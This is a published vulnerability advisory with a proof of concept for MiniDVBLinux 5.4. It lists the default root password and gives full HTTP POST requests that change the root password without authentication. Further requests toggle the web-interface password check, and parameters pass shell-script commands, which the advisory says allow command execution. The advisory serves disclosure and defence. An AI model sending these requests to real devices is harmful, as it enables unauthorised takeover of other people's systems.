MiniDVBLinux 5.4 Change Root Password

🗓️ 17 Oct 2022 00:00:00Reported by LiquidWorm, zeroscience.mkType
packetstorm🔗 packetstormsecurity.com👁 210 Views
MiniDVBLinux 5.4 Change Root Password PoC. Remote attacker can change root password without authentication. Command execution via POST parameters. Vendor: MiniDVBLinux
`  
MiniDVBLinux 5.4 Change Root Password PoC  
  
  
Vendor: MiniDVBLinux  
Product web page: https://www.minidvblinux.de  
Affected version: <=5.4  
  
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple  
way to convert a standard PC into a Multi Media Centre based on the  
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this  
Linux based Digital Video Recorder: Watch TV, Timer controlled  
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration  
via browser, and a lot more. MLD strives to be as small as possible,  
modular, simple. It supports numerous hardware platforms, like classic  
desktops in 32/64bit and also various low power ARM systems.  
  
Desc: The application allows a remote attacker to change the root  
password of the system without authentication (disabled by default)  
and verification of previously assigned credential. Command execution  
also possible using several POST parameters.  
  
Tested on: MiniDVBLinux 5.4  
BusyBox v1.25.1  
Architecture: armhf, armhf-rpi2  
GNU/Linux 4.19.127.203 (armv7l)  
VideoDiskRecorder 2.4.6  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2022-5715  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php  
  
  
24.09.2022  
  
--  
  
  
Default root password: mld500  
  
Change system password:  
-----------------------  
  
POST /?site=setup&section=System HTTP/1.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6  
Cache-Control: max-age=0  
Connection: keep-alive  
Content-Length: 778  
Content-Type: application/x-www-form-urlencoded  
Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba  
Host: ip:8008  
Origin: http://ip:8008  
Referer: http://ip:8008/?site=setup&section=System  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36  
sec-gpc: 1  
  
APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+  
  
  
Pretty post data:  
  
APT_UPGRADE_CHECK: 1  
APT_SYSTEM_ID: 1  
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass  
APT_PACKAGE_CLASS: stable  
SYSTEM_NAME: MiniDVBLinux  
SYSTEM_VERSION_command: /etc/setup/base.sh setversion  
SYSTEM_VERSION: 5.4  
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword  
SYSTEM_PASSWORD: r00t  
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi  
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd  
BUSYBOX_NTPD: 1  
LOG_LEVEL: 1  
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog  
SYSLOG_SIZE:   
LANG_command: /etc/setup/locales.sh setlang  
LANG: en_GB.UTF-8  
TIMEZONE_command: /etc/setup/locales.sh settimezone  
TIMEZONE: Europe/Kumanovo  
KEYMAP_command: /etc/setup/locales.sh setkeymap  
KEYMAP: de-latin1  
action: save  
params:   
changed: SYSTEM_PASSWORD   
  
  
Eenable webif password check:  
-----------------------------  
  
POST /?site=setup&section=System HTTP/1.1  
  
APT_UPGRADE_CHECK: 1  
APT_SYSTEM_ID: 1  
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass  
APT_PACKAGE_CLASS: stable  
SYSTEM_NAME: MiniDVBLinux  
SYSTEM_VERSION_command: /etc/setup/base.sh setversion  
SYSTEM_VERSION: 5.4  
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword  
SYSTEM_PASSWORD:   
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi  
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd  
BUSYBOX_NTPD: 1  
LOG_LEVEL: 1  
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog  
SYSLOG_SIZE:   
LANG_command: /etc/setup/locales.sh setlang  
LANG: en_GB.UTF-8  
TIMEZONE_command: /etc/setup/locales.sh settimezone  
TIMEZONE: Europe/Berlin  
KEYMAP_command: /etc/setup/locales.sh setkeymap  
KEYMAP: de-latin1  
WEBIF_PASSWORD_CHECK: 1  
action: save  
params:   
changed: WEBIF_PASSWORD_CHECK   
  
  
Disable webif password check:  
-----------------------------  
  
POST /?site=setup&section=System HTTP/1.1  
  
APT_UPGRADE_CHECK: 1  
APT_SYSTEM_ID: 1  
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass  
APT_PACKAGE_CLASS: stable  
SYSTEM_NAME: MiniDVBLinux  
SYSTEM_VERSION_command: /etc/setup/base.sh setversion  
SYSTEM_VERSION: 5.4  
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword  
SYSTEM_PASSWORD:   
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi  
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd  
BUSYBOX_NTPD: 1  
LOG_LEVEL: 1  
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog  
SYSLOG_SIZE:   
LANG_command: /etc/setup/locales.sh setlang  
LANG: en_GB.UTF-8  
TIMEZONE_command: /etc/setup/locales.sh settimezone  
TIMEZONE: Europe/Berlin  
KEYMAP_command: /etc/setup/locales.sh setkeymap  
KEYMAP: de-latin1  
action: save  
params:   
changed: WEBIF_PASSWORD_CHECK   
`
17 Oct 2022 00:00Current
0.2Low risk
Vulners AI Score0.2